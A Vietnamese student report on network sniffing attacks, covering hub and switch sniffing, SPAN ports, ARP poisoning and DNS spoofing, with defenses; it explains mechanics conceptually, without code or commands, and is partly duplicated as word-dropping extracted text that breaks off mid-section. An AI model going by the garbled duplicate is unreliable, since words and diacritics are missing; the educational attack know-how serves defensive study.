MỤC LỤCLỜI MỞ ĐẦU6DANH MỤC HÌNH VẼ7CHƯƠNG 1: GIỚI THIỆU81.1.Tổng quan về an ninh mạng và các nguy cơ gây mất an ninh mạng81.2.Các kiểu tấn công mạng phổ biến81.3.Mục tiêu của báo cáo10CHƯƠNG 2: PHƯƠNG PHÁP TẤN CÔNG SNIFFING VÀ CÁCH PHÒNG CHỐNG122.1.Giới thiệu122.1.1.Khái niệm sniffing122.1.2.Cơ chế hoạt động của sniffing122.1.3.Phân loại sniffing132.1.4.Các hình thức tấn công142.2.Lắng nghe thông tin qua Hub142.2.1.Phương pháp tấn công142.4.Lắng nghe thông tin qua Span Port trên Switch172.5.Lắng nghe thông tin qua Gateway182.6.Chặn bắt thông tin dùng ARP – Poisoning192.6.1Cách thức hoạt động của ARP poisoning202.6.2Các biện pháp phòng chống222.7.Chặn bắt thông tin dùng DNS – Spoofing232.7.1Giao thức DNS232.7.2Phương pháp tấn công DNS – Spoofing242.7.3Các biện pháp phòng chống DNS Spoofing25CHƯƠNG 3: DEMO MỘT SỐ PHƯƠNG PHÁP TẤN CÔNG SNIFFING273.1.Mô hình minh họa27TÀI LIỆU THAM KHẢO27 LỜI MỞ ĐẦUTheo thống kê và tính toán của Cục An toàn thông tin và Trung tâm Ứng cứu khẩn cấp máy tính Việt Nam (VNCERT) Bộ TTTT, năm 2016, Việt Nam phát hiện 135.190 cuộc tấn công mạng, tăng gấp hơn 3 lần so với năm 2015, trong đó có 10.276 cuộc tấn công lừa đảo (Phishing), 47.135 cuộc tấn công cài phần mềm độc hại (Malware) và 77.779 cuộc tấn công thay đổi giao diện (Deface). Trong đó, có 201 cuộc tấn công thay đổi giao diện vào các hệ thống có tên miền “.gov.vn”.Riêng trong nửa đầu năm 2017, Trung tâm VNCERT ghi nhận 6.303 cuộc tấn công mạng vào các hệ thống thông tin của Việt Nam, bao gồm 1.522 cuộc tấn công lừa đảo, 3.792 cuộc tấn công cài đặt phần mềm độc hại và 989 cuộc tấn công thay đổi giao diện. Tổng số cuộc tấn công mạng vào các hệ thống thông tin sử dụng tên miền “.gov.vn” trong 6 tháng đầu năm 2017 là 25 cuộc.Các cuộc tấn công ngày nay ngày càng diễn biến phức tạp, với số lượng các cuộc tấn công mạng vào những cơ quan, tổ chức, doanh nghiệp có chiều hướng tăng so với các năm trước đây, nhất là các cuộc tấn công mạng vào hệ thống thông tin của cơ quan nhà nước và các doanh nghiệp lớn.Bài báo cáo sẽ giới thiệu tổng quát về phương pháp Hacker sử dụng để tấn công mạng, nói cụ thể về phương pháp tấn công sniffing và cách phòng chống. Nội dung bài báo cáo gồm 03 chương:CHƯƠNG 1: GIỚI THIỆUCHƯƠNG 2: PHƯƠNG PHÁP TẤN CÔNG SNIFFING VÀ CÁCH PHÒNG CHỐNGCHƯƠNG 3: DEMO PHƯƠNG PHÁP TẤN CÔNG SNIFFING DANH MỤC HÌNH VẼHình 2.1: Cơ chế hoạt động của sniffingHình 2.2.1: Lắng nghe thông tin qua HubHình 2.2.2: Xung đột khi nhiều thiết bị cùng truyền thông tại một thời điểmHình 2.3.1: Mô hình tấn công của MITMHình 2.4.1: Cơ chế hoạt động của Span portHình 2.5.1: Mô hình làm việc của GatewayHình 2.6.1: Cách thức hoạt động của ARPHình 2.6.2: Chặn bắt thông tin dùng ARP PoisoningHình 2.7.1: Mô hình tấn công DNS – spoofingHình 2.7.2: Tấn công giả mạo DNS sử dụng phương pháp ID Spoofing CHƯƠNG 1: GIỚI THIỆU1.1.Tổng quan về an ninh mạng và các nguy cơ gây mất an ninh mạngTrong bối cảnh tiến trình hội nhập, vấn đề an ninh mạng và bảo mật dữ liệu đang trở nên rất được quan tâm. Khi cơ sở hạ tầng và các công nghệ mạng ngày càng được đáp ứng tốt, tuy nhiên song song với việc đó là thực trạng tấn công trên mạng đang ngày một gia tăng, thì vấn đề bảo mật càng được chú trọng hơn. Không chỉ các nhà cung cấp dịch vụ Internet, các cơ quan chính phủ mà các doanh nghiệp, tổ chức cũng có ý thức hơn về an toàn thông tin. Bảo mật hay an toàn thông tin là sự bảo vệ thông tin trước các mối đe dọa về thông tin lộ, thông tin không còn toàn vẹn và thông tin không sẵn sàng. Ngoài ra, nó còn là sự bảo vệ chống lại các nguy cơ về mất an toàn thông tin như nguy hiểm, thiệt hại, mất mát và các tội phạm khác. Bảo mật như là hình thức về mức độ bảo vệ thông tin bao gồm cấu trúc và quá trình xử lý để nâng cao bảo mật.Các nguyên tắc nền tảng của an ninh mạng:•Tính bí mật: Là sự ngăn ngừa việc tiết lộ trái phép những thông tin quan trọng, nhạy cảm. Đó là khả năng đảm bảo mức độ bí mật cần thiết được tuân thủ và thông tin quan trọng, nhạy cảm đó được che giấu với người dùng không được cấp phép. Đối với an ninh mạng thì tính bí mật rõ ràng là điều đầu tiên được nói đến và nó thường xuyên bị tấn công nhất•Tính toàn vẹn: Là sự phát hiện và ngăn ngừa việc sửa đổi trái phép về dữ liệu, thông tin và hệ thống, do đó đảm bảo được sự chính xác của thông tin và hệ thống. Có ba mục đích chính của việc đảm bảo tính toàn vẹn: Ngăn cản sự làm biến dạng nội dung thông tin của những người sử dụng không được phép.Ngăn cản sự làm biến dạng nội dung thông tin không được phép hoặc không chủ tâm của những người sử dụng được phép. Duy trì sự toàn vẹn dữ liệu cả trong nội bộ và bên ngoài.•Tính sẵn sàng: Bảo đảm các người sử dụng hợp pháp của hệ thống có khả năng truy cập đúng lúc và không bị ngắt quãng tới các thông tin trong hệ thống và tới mạng. Tính sẵn sàng có liên quan đến độ tin cậy của hệ thống. 1.2.Các kiểu tấn công mạng phổ biếnCó rất nhiều kiểu tấn công mạng để xâm nhập vào một hệ thống máy tính, nhưng phổ biến thường là các kiểu tấn công sau đây:•Tấn công trực tiếp: Những cuộc tấn công trực tiếp thông thường được sử dụng trong giai đoạn đầu để chiếm quyền truy nhập bên trong. Một phương pháp tấn công cổ điển là dò tìm tên người sử dụng và mật khẩu. Đây là phương pháp đơn giản, dễ thực hiện và không đòi hỏi một điều kiện đặc biệt nào để bắt đầu. Kẻ tấn công có thể sử dụng những thông tin như tên người dùng, ngày sinh, địa chỉ, số nhà…để đoán mật khẩu. Trong trường hợp có được danh sách người sử dụng và những thông tin về môi trường làm việc, có một chương trình tự động hoá về việc dò tìm mật khẩu này. Trong một số trường hợp phương pháp này cho phép kẻ tấn công có được quyền của người quản trị hệ thống (root hay administrator). Hai chương trình thường được dùng cho phương pháp này là chương trình Sendmail và Rlogin của hệ thống Unix. Sendmail là một chương trình phức tạp với mã nguồn bao gồm hàng ngàn dòng lệnh C. Sendmail được chạy với quyền của người quản trị hệ thống do chương trình phải có quyền ghi vào hộp thư của người sử dụng. Vì Sendmail nhận trực tiếp các yêu cầu về mạng thư tín bên ngoài nên nó trở thành nguồn cung cấp những lỗ hổng bảo mật để truy cập hệ thống. Rlogin cho phép người sử dụng từ một máy trên mạng truy cập từ xa vào một máy khác sử dụng tài nguyên của máy này. Trong quá trình nhập tên và mật khẩu của người sử dụng, rlogin không kiểm tra độ dài dòng nhập nên ta có thể đưa vào một xâu lệnh đã được tính toán trước để ghi đè lên mã chương trình của Rlogin, từ đó chiếm quyền truy cập.•Nghe trộm: Việc nghe trộm thông tin trên mạng có thể đưa lại những thông tin có ích như tên, mật khẩu của người sử dụng, các thông tin mật chuyển qua mạng. Việc nghe trộm thường được tiến hành ngay sau khi kẻ tấn công đã chiếm được quyền truy nhập hệ thống, thông qua các chương trình cho phép đưa card giao tiếp mạng (Network Interface CardNIC) vào chế độ nhận toàn bộ các thông tin lưu truyền trên mạng. Những thông tin này cũng có thể dễ dàng lấy được trên Internet.•Giả mạo địa chỉ:Việc giả mạo địa chỉ IP có thể được thực hiện thông qua việc sử dụng khả năng dẫn đường trực tiếp (sourcerouting). Với cách tấn công này, kẻ tấn công gửi các gói tin IP tới mạng bên trong với một địa chỉ IP giả mạo (thông thường là địa chỉ của một mạng hoặc một máy được coi là an toàn đối với mạng bên trong), đồng thời chỉ rõ đường dẫn mà các gói tin IP phải gửi đi.•Vô hiệu các chức năng của hệ thống: Đây là kiểu tấn công nhằm tê liệt hệ thống, không cho nó thực hiện chức năng mà nó thiết kế. Kiểu tấn công này không thể ngăn chặn được, do những phương tiện được tổ chức tấn công cũng chính là các phương tiện để làm việc và truy nhập thông tin trên mạng. Ví dụ sử dụng lệnh ping với tốc độ cao nhất có thể, buộc một hệ thống tiêu hao toàn bộ tốc độ tính toán và khả năng của mạng để trả lời các lệnh này, không còn các tài nguyên để thực hiện những công việc có ích khác.•Sử dụng lỗi của người quản trị hệ thống:Đây không phải là một kiểu tấn công của những kẻ đột nhập, tuy nhiên lỗi của người quản trị hệ thống thường tạo ra những lỗ hổng cho phép kẻ tấn công sử dụng để truy nhập vào mạng nội bộ.•Tấn công vào yếu tố con người:Kẻ tấn công có thể liên lạc với một người quản trị hệ thống, giả làm một người sử dụng để yêu cầu thay đổi mật khẩu, thay đổi quyền truy nhập của mình đối với hệ thống, hoặc thậm chí thay đổi một số cấu hình của hệ thống để thực hiện các phương pháp tấn công khác. Với kiểu tấn công này không một thiết bị nào có thể ngăn chặn một cách hữu hiệu, và chỉ có một cách giáo dục người sử dụng mạng nội bộ về những yêu cầu bảo mật để đề cao cảnh giác với những hiện tượng đáng nghi. Nói chung yếu tố con người là một điểm yếu trong bất kỳ một hệ thống bảo vệ nào, và chỉ có sự giáo dục cộng với tinh thần hợp tác từ phía người sử dụng để có thể nâng cao được độ an toàn của hệ thống bảo vệ.1.3.Mục tiêu của báo cáoVới sự phát triển mạnh mẽ của mạng máy tính hiện nay, nhu cầu sử dụng mạng cho việc trao đổi và chia sẻ thông tin là rất lớn. Tuy nhiên, đi song song với việc đó thì an ninh mạng luôn là một nỗi lo khi các hình thức tấn công mạng ngày một nhiều và ngày càng trở nên tinh vi hơn. Do vậy việc nghiên cứu về các phương pháp tấn công mạng và cách phòng chống là điều tất yếu.Bài báo cáo “NGHIÊN CỨU CÁC PHƯƠNG PHÁP TẤN CÔNG SNIFFER” được thực hiện nhằm tìm hiểu về các kiểu tấn công phổ biến trên mạng. Cụ thể, bài báo cáo sẽ đi sâu vào nghiên cứu phương pháp tấn công sniffing và cách phòng chống.Mục tiêu đề ra là:Tìm hiểu một số kiểu tấn công phổ biến trên mạng.Tìm hiểu phương pháp tấn công sniffing.Cách phòng chống tấn công sniffing.
MỤC LỤC LỜI MỞ ĐẦU Theo thống kê tính tốn Cục An tồn thơng tin Trung tâm Ứng cứu khẩn cấp máy tính Việt Nam (VNCERT) - Bộ TT&TT, năm 2016, Việt Nam phát 135.190 công mạng, tăng gấp lần so với năm 2015, có 10.276 cơng lừa đảo (Phishing), 47.135 công cài phần mềm độc hại (Malware) 77.779 công thay đổi giao diện (Deface) Trong đó, có 201 cơng thay đổi giao diện vào hệ thống có tên miền “.gov.vn” Riêng nửa đầu năm 2017, Trung tâm VNCERT ghi nhận 6.303 công mạng vào hệ thống thông tin Việt Nam, bao gồm 1.522 công lừa đảo, 3.792 công cài đặt phần mềm độc hại 989 công thay đổi giao diện Tổng số công mạng vào hệ thống thông tin sử dụng tên miền “.gov.vn” tháng đầu năm 2017 25 Các công diễn biến phức tạp, với số lượng công mạng vào quan, tổ chức, doanh nghiệp có chiều hướng tăng so với năm trước đây, công mạng vào hệ thống thông tin quan nhà nước doanh nghiệp lớn Bài báo cáo giới thiệu tổng quát phương pháp Hacker sử dụng để cơng mạng, nói cụ thể phương pháp cơng sniffing cách phịng chống Nội dung báo cáo gồm 03 chương: CHƯƠNG 1: GIỚI THIỆU CHƯƠNG 2: PHƯƠNG PHÁP TẤN CÔNG SNIFFING VÀ CÁCH PHÒNG CHỐNG CHƯƠNG 3: DEMO PHƯƠNG PHÁP TẤN CƠNG SNIFFING DANH MỤC HÌNH VẼ Hình 2.1: Cơ chế hoạt động sniffing Hình 2.2.1: Lắng nghe thơng tin qua Hub Hình 2.2.2: Xung đột nhiều thiết bị truyền thơng thời điểm Hình 2.3.1: Mơ hình cơng MITM Hình 2.4.1: Cơ chế hoạt động Span port Hình 2.5.1: Mơ hình làm việc Gateway Hình 2.6.1: Cách thức hoạt động ARP Hình 2.6.2: Chặn bắt thơng tin dùng ARP Poisoning Hình 2.7.1: Mơ hình cơng DNS – spoofing Hình 2.7.2: Tấn công giả mạo DNS sử dụng phương pháp ID Spoofing CHƯƠNG 1: GIỚI THIỆU 1.1 Tổng quan an ninh mạng nguy gây an ninh mạng Trong bối cảnh tiến trình hội nhập, vấn đề an ninh mạng bảo mật liệu trở nên quan tâm Khi sở hạ tầng công nghệ mạng ngày đáp ứng tốt, nhiên song song với việc thực trạng công mạng ngày gia tăng, vấn đề bảo mật trọng Không nhà cung cấp dịch vụ Internet, quan phủ mà doanh nghiệp, tổ chức có ý thức an tồn thơng tin Bảo mật hay an tồn thơng tin bảo vệ thông tin trước mối đe dọa "thơng tin lộ", "thơng tin khơng cịn tồn vẹn" "thơng tin khơng sẵn sàng" Ngồi ra, cịn bảo vệ chống lại nguy an tồn thơng tin "nguy hiểm", "thiệt hại", "mất mát" tội phạm khác Bảo mật hình thức mức độ bảo vệ thơng tin bao gồm "cấu trúc" "quá trình xử lý" để nâng cao bảo mật Các nguyên tắc tảng an ninh mạng: • Tính bí mật: Là ngăn ngừa việc tiết lộ trái phép thông tin quan • trọng, nhạy cảm Đó khả đảm bảo mức độ bí mật cần thiết tuân thủ thơng tin quan trọng, nhạy cảm che giấu với người dùng không cấp phép Đối với an ninh mạng tính bí mật rõ ràng điều nói đến thường xuyên bị cơng Tính tồn vẹn: Là phát ngăn ngừa việc sửa đổi trái phép • liệu, thơng tin hệ thống, đảm bảo xác thơng tin hệ thống Có ba mục đích việc đảm bảo tính tồn vẹn: - Ngăn cản làm biến dạng nội dung thông tin người sử dụng không phép - Ngăn cản làm biến dạng nội dung thông tin không phép không chủ tâm người sử dụng phép - Duy trì toàn vẹn liệu nội bên ngồi Tính sẵn sàng: Bảo đảm người sử dụng hợp pháp hệ thống có khả truy cập lúc không bị ngắt quãng tới thơng tin hệ thống tới mạng Tính sẵn sàng có liên quan đến độ tin cậy hệ thống 1.2 Các kiểu cơng mạng phổ biến Có nhiều kiểu công mạng để xâm nhập vào hệ thống máy tính, phổ biến thường kiểu cơng sau đây: • Tấn cơng trực tiếp: • Những cơng trực tiếp thơng thường sử dụng giai đoạn đầu để chiếm quyền truy nhập bên Một phương pháp công cổ điển dị tìm tên người sử dụng mật Đây phương pháp đơn giản, dễ thực khơng địi hỏi điều kiện đặc biệt để bắt đầu Kẻ cơng sử dụng thông tin tên người dùng, ngày sinh, địa chỉ, số nhà…để đoán mật Trong trường hợp có danh sách người sử dụng thơng tin mơi trường làm việc, có chương trình tự động hố việc dị tìm mật Trong số trường hợp phương pháp cho phép kẻ cơng có quyền người quản trị hệ thống (root hay administrator) Hai chương trình thường dùng cho phương pháp chương trình Sendmail Rlogin hệ thống Unix Sendmail chương trình phức tạp với mã nguồn bao gồm hàng ngàn dòng lệnh C Sendmail chạy với quyền người quản trị hệ thống chương trình phải có quyền ghi vào hộp thư người sử dụng Vì Sendmail nhận trực tiếp yêu cầu mạng thư tín bên ngồi nên trở thành nguồn cung cấp lỗ hổng bảo mật để truy cập hệ thống Rlogin cho phép người sử dụng từ máy mạng truy cập từ xa vào máy khác sử dụng tài nguyên máy Trong trình nhập tên mật người sử dụng, rlogin không kiểm tra độ dài dịng nhập nên ta đưa vào xâu lệnh tính tốn trước để ghi đè lên mã chương trình Rlogin, từ chiếm quyền truy cập Nghe trộm: • Việc nghe trộm thơng tin mạng đưa lại thơng tin có ích tên, mật người sử dụng, thông tin mật chuyển qua mạng Việc nghe trộm thường tiến hành sau kẻ công chiếm quyền truy nhập hệ thống, thông qua chương trình cho phép đưa card giao tiếp mạng (Network Interface Card-NIC) vào chế độ nhận toàn thông tin lưu truyền mạng Những thông tin dễ dàng lấy Internet Giả mạo địa chỉ: Việc giả mạo địa IP thực thông qua việc sử dụng khả dẫn đường trực tiếp (source-routing) Với cách công • này, kẻ cơng gửi gói tin IP tới mạng bên với địa IP giả mạo (thông thường địa mạng máy coi an toàn mạng bên trong), đồng thời rõ đường dẫn mà gói tin IP phải gửi Vơ hiệu chức hệ thống: • Đây kiểu cơng nhằm tê liệt hệ thống, khơng cho thực chức mà thiết kế Kiểu cơng ngăn chặn được, phương tiện tổ chức cơng phương tiện để làm việc truy nhập thông tin mạng Ví dụ sử dụng lệnh ping với tốc độ cao có thể, buộc hệ thống tiêu hao tồn tốc độ tính tốn khả mạng để trả lời lệnh này, khơng cịn tài ngun để thực cơng việc có ích khác Sử dụng lỗi người quản trị hệ thống: • Đây kiểu công kẻ đột nhập, nhiên lỗi người quản trị hệ thống thường tạo lỗ hổng cho phép kẻ công sử dụng để truy nhập vào mạng nội Tấn công vào yếu tố người: Kẻ cơng liên lạc với người quản trị hệ thống, giả làm người sử dụng để yêu cầu thay đổi mật khẩu, thay đổi quyền truy nhập hệ thống, chí thay đổi số cấu hình hệ thống để thực phương pháp công khác Với kiểu cơng khơng thiết bị ngăn chặn cách hữu hiệu, có cách giáo dục người sử dụng mạng nội yêu cầu bảo mật để đề cao cảnh giác với tượng đáng nghi Nói chung yếu tố người điểm yếu hệ thống bảo vệ nào, có giáo dục cộng với tinh thần hợp tác từ phía người sử dụng để nâng cao độ an toàn hệ thống bảo vệ 1.3 Mục tiêu báo cáo Với phát triển mạnh mẽ mạng máy tính nay, nhu cầu sử dụng mạng cho việc trao đổi chia sẻ thông tin lớn Tuy nhiên, song song với việc an ninh mạng ln nỗi lo hình thức cơng mạng ngày nhiều ngày trở nên tinh vi Do việc nghiên cứu phương pháp công mạng cách phòng chống điều tất yếu Bài báo cáo “NGHIÊN CỨU CÁC PHƯƠNG PHÁP TẤN CÔNG SNIFFER” thực nhằm tìm hiểu kiểu cơng phổ biến mạng Cụ thể, báo cáo sâu vào nghiên cứu phương pháp công sniffing cách phòng chống Mục tiêu đề là: Tìm hiểu số kiểu cơng phổ biến mạng Tìm hiểu phương pháp cơng sniffing Cách phịng chống cơng sniffing CHƯƠNG 2: PHƯƠNG PHÁP TẤN CƠNG SNIFFING VÀ CÁCH PHỊNG CHỐNG 2.1 Giới 2.1.1 thiệu Khái niệm sniffing Sniffing hình thức nghe hệ thống mạng dựa đặc điểm chế TCP/IP Người nghe để thiết bị lắng nghe mạng mang thông tin hai thiết bị điện thoại hai thiết bị đầu cuối internet Nghe sử dụng công cụ để nhà quản trị mạng theo dõi, bảo trì hệ thống mạng kiểm tra liệu vào mạng Về mặt tiêu cực, sử dụng với mục đích nghe thơng tin mạng để lấy thông tin quan trọng 2.1.2 Cơ chế hoạt động sniffing Những giao dịch hệ thống mạng máy tính thường liệu dạng nhị phân Bởi để hiểu liệu này, chương trình nghe phải có tính phân tích nghi thức, tính giải mã liệu dạng nhị phân để hiểu chúng Hình 2.1: Cơ chế hoạt động sniffing Trong mơi trường Hub: Một khung gói tin chuyển từ máy A sang máy B đồng thời gửi đến tất máy khác kết nối Hub theo chế loan tin (broadcast) Các máy khác nhận gói tin tiến hành so sánh yêu cầu địa MAC frame gói tin với địa đích Nếu trùng lập nhận, cịn khơng cho qua Do gói tin từ A gửi đến B nên so sánh có B giống địa đích đến nên có B thực tiếp nhận Dựa vào nguyên tắc đó, máy cài đặt chương trình nghe trộm “tự nhận” gói tin lưu chuyển mạng qua Hub, kể đích đến gói tin có đích đến khơng phải nó, sniffer chuyển card mạng máy sang chế độ hỗn tạp (promiscuous mode) Promiscuous mode chế độ đặc biệt Khi card mạng đặt chế độ này, nhận tất gói tin mà khơng bị ràng buộc kiểm tra địa đích đến Trong mơi trường Switch: Khác với Hub, Switch chuyển tải gói tin đến địa cổng xác định bảng chuyển mạch nên nghe trộm kiểu “tự nhận” Hub không thực Tuy nhiên, kẻ cơng dùng chế khác để công môi trường Switch ARP spoofing, MAC spoofing, MAC duplicating, DNS spoofing, v.v… 2.1.3 Phân loại sniffing Passive sniffing: Chủ yếu hoạt động mơi trường khơng có thiết bị chuyển mạch gói, phổ biến dạng mạng sử dụng Hub Do khơng có thiết bị chuyển mạch gói nên gói tin broadcast mạng Chính vậy, việc thực sniffing đơn giản Kẻ công không cần gửi gói tin giả mạo nào, cần bắt gói tin từ Port (dù host nhận gói tin khơng phải nơi đến gói tin đó) Hình thức sniffing khó phát máy tự broadcast gói tin Ngày hình thức thường sử dụng Hub khơng cịn ưa chuộng nhiều, thay vào Switch Active sniffing: Chủ yếu hoạt động mơi trường có thiết bị chuyển mạch gói, phổ biến dạng mạch sử dụng Switch Kẻ công thực sniffing dựa chế ARP RARP (2 chế chuyển đổi từ IP sang MAC từ MAC sang IP) cách phát gói tin đầu độc, mà cụ thể phát gói thơng báo cho máy gửi gói tin “tơi người nhận” mặc khơng phải “người nhận” Ngồi ra, sniffer cịn dùng phương pháp giả địa MAC, thay đổi MAC thân thành MAC máy hợp lệ qua chức lọc MAC thiết bị, qua ép dịng liệu qua card mạng Tuy nhiên, gói tin phải gửi nên chiếm băng thơng Nếu thực 10 Một điều cần ghi nhớ thiết lập SPAN bạn sử dụng port nguồn có băng thơng lớn port đích, trường hợp link bị nghẽn, giao thông dừng lại 2.5 Lắng nghe thông tin qua Gateway Với số lượng hệ thống / nút ngày tăng giới, địa IPv4 không đủ để xác định tất hệ thống kết nối với internet Do đó, không gian địa IP định, gọi địa định tuyến, sử dụng để xác định nút mạng LAN, tất giao tiếp với giới bên ngồi thơng qua gateway Hình 2.3.1: Mơ hình làm việc Gateway Do đó,với hệ thống mạng thơng thường, tất lưu lượng đến qua gateway, sau hoạt động cho lưu lượng phân phối đến nút ban đầu mạng LAN Một số khái niệm NAT ARP (hoặc Giao thức khám phá lân cận thay trường hợp IPv6) sử dụng Chúng ta quan tâm đến ARP (Giao thức phân giải địa chỉ) trì bảng ánh xạ MAC-IP cập nhật định kỳ Địa MAC coi địa phần cứng, địa IPv4 định động nút tham gia mạng Cổng vào, nhận lưu lượng mạng đến, sử dụng NAT để dịch địa IP đích sang địa IPv4 cục Sau đó, tìm kiếm địa MAC tương ứng bảng ARP, tạo lớp Ethernet với địa MAC phát gần gửi gói tin 15 Tuyến đường [Gateway] bị nhiễm độc Ý tưởng giả mạo gói tin mang IP nguồn máy MAC nguồn máy khác Nút nhận thông báo khác biệt cập nhật bảng ARP Q trình cơng chi tiết giới thiệu kỹ phần bắt chặn thông tin ARP poisoning 2.6 Chặn bắt thông tin dùng ARP – Poisoning 2.6.1 Khái niệm nguyên tắc làm việc ARP mạng LAN Tầng Network mơ hình OSI sử dụng loại địa mang tính chất quy ước IP, IPX… Trên thực tế, card mạng (NIC) kết nối với theo địa MAC, địa cố định phần cứng Chính vậy, giao thức phân giải địa chỉ: Address Resolution Protocol (ARP) sử dụng để chuyển đổi dạng địa qua lại với Khi thiết bị mạng muốn biết địa MAC thiết bị mạng mà biết địa tầng network (IP, IPX…) gửi ARP request bao gồm địa MAC address địa IP thiết bị mà cần biết MAC address toàn miền broadcast Mỗi thiết bị nhận request so sánh địa IP request với địa tầng network Nếu trùng địa thiết bị phải gửi ngược lại ARP reply cho thiết bị gửi ARP request (trong có chứa địa MAC mình) Lấy ví dụ hệ thống mạng đơn giản, PC A muốn gửi gói tin đến PC B biết địa IP PC B Khi PC A phải gửi ARP request broadcast cho toàn mạng để hỏi xem "địa MAC PC có địa IP gì?" Khi PC B nhận broadcast này, so sánh địa IP gói tin với địa IP Nhận thấy địa IP mình, PC B gửi lại gói tin ARP reply cho PC A, có chứa địa MAC B Sau PC A bắt đầu truyền gói tin cho B 16 Hình 2.6.1: Cách thức hoạt động ARP ARP giao thức phi trạng thái Máy chủ mạng tự động lưu trữ ARP reply mà chúng nhận được, máy khác có u cầu hay khơng Ngay mục ARP chưa hết hạn bị ghi đè nhận gói tin ARP reply Khơng có phương pháp giao thức ARP mà giúp máy xác nhận máy mà từ gói tin bắt nguồn Hành vi lỗ hổng cho phép ARP spoofing xảy 2.6.1 Cách thức hoạt động ARP poisoning Giao thức ARP vốn thiết kế nhằm mục đích tạo tính thuận tiện để trao đổi địa lớp thứ lớp thứ mơ hình OSI Lớp thứ hai, hay cịn gọi với tên khác tầng data-link, sử dụng địa MAC để thiết bị phần cứng thể giao tiếp với cách trực tiếp diện nhỏ Còn với lớp thứ 3, tên khác tầng network, lại sử dụng địa IP để tạo mạng với diện rộng để giao tiếp toàn cầu Tổ chức giao thức ARP vốn xoay quanh hai gói tin chính, ARP request ARP reply Mục đích gói tin request reply để định vị địa MAC thiết bị phần cứng tương ứng với địa IP mà gán cho Từ đó, luồng liệu truyền tới đích 17 mạng mà khơng bị thất lạc hay nhầm lẫn máy tính khác khơng u cầu gói tin Để hiểu tính chất request reply, ta hình dung đơn giản sau Gói request gửi cho thiết bị mạng phát thông điệp “Xin chào, địa IP X.X.X.X, địa MAC X:X:X:X:X:X Tôi cần gửi thứ đến máy có địa IP Y.Y.Y.Y, tiếc thay tơi khơng có địa MAC anh Vậy có địa IP tơi vừa nói vui lòng phản hồi kèm theo địa MAC anh để tơi trao gói tin này.” Lúc này, máy cần phản hồi đưa gói ARP reply với thơng điệp “Tơi người anh cần tìm Tơi có địa IP Y.Y.Y.Y MAC tơi Y:Y:Y:Y:Y:Y” Khi q trình truyền giao gói tin hồn tất, thiết bị phát cập nhật bảng ARP cache hai thiết bị truyền thơng với Việc đầu độc gói tin ARP đánh vào yếu tố bất lợi khơng bảo mật giao thức ARP ban đầu Rõ ràng qua đoạn thấy tính bất cập gói ARP request reply Bất kỳ máy tính khơng phải mang địa Y.Y.Y.Y lấn quyền máy thật giả mạo mang IP đó, sau đem địa MAC cung cấp Bên request khơng có chế kiểm sốt chặt chẽ người đứng nhận, mà vào địa IP chấp nhận chuyển 18 Hình 2.6.2: Chặn bắt thông tin dùng ARP Poisoning Đặc biệt, giao thức ARP khơng giống DNS cấu hình để chấp nhận nâng cấp động (dynamic updates), thiết bị sử dụng giao thức ARP chấp nhận cập nhật lúc Điều có nghĩa thiết bị gửi gói ARP reply đến máy tính khác máy tính cập nhật vào bảng ARP cache giá trị Việc gửi gói ARP reply khơng có request tạo gọi việc gửi ARP “cho không” Khi ARP reply cho khơng đến máy tính gửi request, máy tính request nghĩ người tìm kiếm để truyền tin, nhiên thực chất họ lại bắt đầu thiết lập kết nối với kẻ xấu giả danh để thực cho việc công MITM 2.6.2 Các biện pháp phòng chống Ngày với phát triển phần mềm bảo mật đời giao thức HTTPS, ARP - Poisoning không cịn hiệu lúc trước Có thể kể đến vài biện pháp để phòng chống như: Bảo mật LAN Giả mạo ARP Cache kỹ thuật cơng mà sống sót cố gắng chặn lưu lượng hai thiết bị LAN Chỉ có lý đáng lo ngại vấn đề liệu thiết bị nội mạng có bị thỏa hiệp, cắm thiết bị không tin cậy vào mạng Mặc dù tập trung toàn cố gắng bảo mật lên phạm vi mạng việc phịng chống lại mối đe dọa từ bên việc có thái độ bảo mật bên tốt giúp ta loại trừ loại cơng Mã hóa ARP Cache Một cách bảo vệ chống lại vấn đề khơng an tồn vốn có ARP request ARP reply thực trình động Đây tùy chọn máy tính Windows cho phép ta bổ sung entry tĩnh vào ARP cache Trong trường hợp, nơi cấu hình mạng khơng thay đổi, ta hồn tồn tạo danh sách entry ARP tĩnh sử dụng chúng cho client thông qua kịch tự động Điều bảo đảm thiết bị dựa vào ARP cache nội chúng thay ARP request ARP reply Kiểm tra lưu lượng ARP với chương trình hãng thứ ba 19 Tùy chọn cuối cho việc phòng chống lại tượng giả mạo ARP cache phương pháp phản ứng có liên quan đến việc kiểm tra lưu lượng mạng thiết bị Ta thực điều với vài hệ thống phát xâm phạm (chẳng hạn Snort) thơng qua tiện ích thiết kế đặc biệt cho mục đích (như xARP) Điều khả thi ta quan tâm đến thiết bị đó, nhiên cồng kềnh vướng mắc việc giải với toàn đoạn mạng 2.7 Chặn 2.7.1 bắt thông tin dùng DNS – Spoofing Giao thức DNS Giao thức DNS (Domain Name System – hệ thống phân giải tên miền) giao thức quan trọng dùng Internet, cho phép thiết lập tương ứng địa IP tên miền Mỗi website có tên (là tên miền hay đường dẫn URL) địa IP Khi mở trình duyệt Web nhập tên website, trình duyệt đến thẳng website mà không cần phải thông qua việc nhập địa IP trang web Quá trình "dịch" tên miền thành địa IP trình duyệt hiểu truy cập vào website công việc DNS server Các DNS trợ giúp qua lại với để dịch địa "IP" thành "tên" ngược lại Người sử dụng cần nhớ "tên", không cần phải nhớ địa IP (địa IP số khó nhớ) 2.7.2 Phương pháp cơng DNS – Spoofing DNS – spoofing kĩ thuật cung cấp thông tin DNS sai lệch cho host Khi người dùng yêu cầu truy cập đến địa website chuyển hướng, đưa người dùng tới địa giả mạo có hình thức giống với địa thật họ khơng hay biết bị lừa Kẻ công lấy cắp thông tin nhạy cảm người dùng, cài phần mềm độc hại, hay gây từ chối dịch vụ 20 Hình 2.7.1: Mơ hình cơng DNS - spoofing Một ví dụ, người dùng cần truy cập hộp thư điện tử địa www.mybank.com có địa IP X.X.X.X đó, kỹ thuật chuyển hướng yêu cầu sang trang giả mạo có địa IP Y.Y.Y.Y kẻ công dựng nên để chiếm đoạt tài khoản người dùng Có nhiều phương pháp triển khai kỹ thuật DNS Spoofing, đơn giản DNS ID Spoofing Mỗi truy vấn DNS gửi qua mạng có chứa số nhận dạng Mục đích số nhận dạng phân biệt truy vấn phản hồi chúng cách xác Để chặn truy vấn DNS gửi từ máy nạn nhân, kẻ cơng tạo gói giả mạo có chứa số nhận dạng để gói liệu chấp nhận máy nạn nhân Hình 2.7.2: Tấn cơng giả mạo DNS sử dụng phương pháp ID Spoofing 21 Quá trình công thực với hai bước Đầu tiên, tiến hành ARP Cache Poisoning thiết 